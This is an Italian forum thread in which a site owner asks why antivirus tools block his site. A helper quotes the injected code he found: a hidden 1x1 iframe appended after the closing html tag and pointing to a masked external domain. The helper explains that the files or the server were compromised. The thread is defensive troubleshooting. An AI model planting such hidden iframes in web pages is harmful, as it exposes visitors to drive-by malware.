Visualizzazione dei risultati da 1 a 4 su 4

SITO WEB!!! Piccolo problema!!! HELP!!!

Ciao a tutti gli iscritti, ho un problema su un sito web che ho fatto io.(www.noiministranti.it).
    Molti visitatori amici miei mi hanno detto che ci sta un virsu sul sito visto e considerato che i loro antivirus lo bloccano e non riescono a visualizzare le pagine.
    Come posso fare per ripristinare il sito in modo che funzioni correttamente?
    HELP ME!!! Grazie..

Esatto. Il problema esiste.
    Il sorgente termina con queste righe:
    (ovviamente ho mascherato il vero indirizzo, per ovvi motivi di sicurezza!)
    codice:
    </html>
    </html>
    </html>

<iframe src="http://xxxxxxxxxx.com/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>
    A parte che 3 chiusure del tag html mi sembrano tantine (ne basta una!) noterai che 'qualcuno' ha aggiunto, DOPO la chiusura del tag html, un bell'iframe invisibile!
    Per inciso, in questo momento l'indirizzo puntato dall'iframe non risponde.

Controlla i tuoi sorgenti che sono sul server.
    Se il file contiene la riga incriminata (l'ultima!), qualcuno &egrave; riuscito a modificare il tuo file.
    Se il file NON contiene la riga incriminata, beh, allora &egrave; pi&ugrave; grave! .. &egrave; il SERVER ad essere compromesso. Contatta il tuo provider!

HTH
    Zappa
    [PC:Presario 2515EU][Cpu:P4@2.3GHz][Ram: 512M][HDU:80G@5400 RPM]
    [Wireless:LinkSys][OS: Ubuntu 9.04 - Jaunty Jackalope]

Buonfrenk, cerca di utilizzare dei titoli più intuitivi la prossima volta che scrivi nel forum e magari dai una letta anche al regolamento del forum

Per quanto riguarda il tuo problema non so che dirti perché il mio antivirus non blocca niente, forse c'è qualche script che viene male interpretato e può essere riconosciuto come pericoloso.
    FEDERIX.IT - [Pillola] GRAFICA DEI FORM

...ho ancora quella forza che ti serve, quando dici "Si comincia!"

x Federix:
    Come ho detto nella mia precedente risposta, in questo momento il sito di cui all'iframe non risponde, anzi, va in errore 503!
    (ovviamente provato con il vecchio buon wget)

ciao!
    Zappa
    [PC:Presario 2515EU][Cpu:P4@2.3GHz][Ram: 512M][HDU:80G@5400 RPM]
    [Wireless:LinkSys][OS: Ubuntu 9.04 - Jaunty Jackalope]

Permessi di invio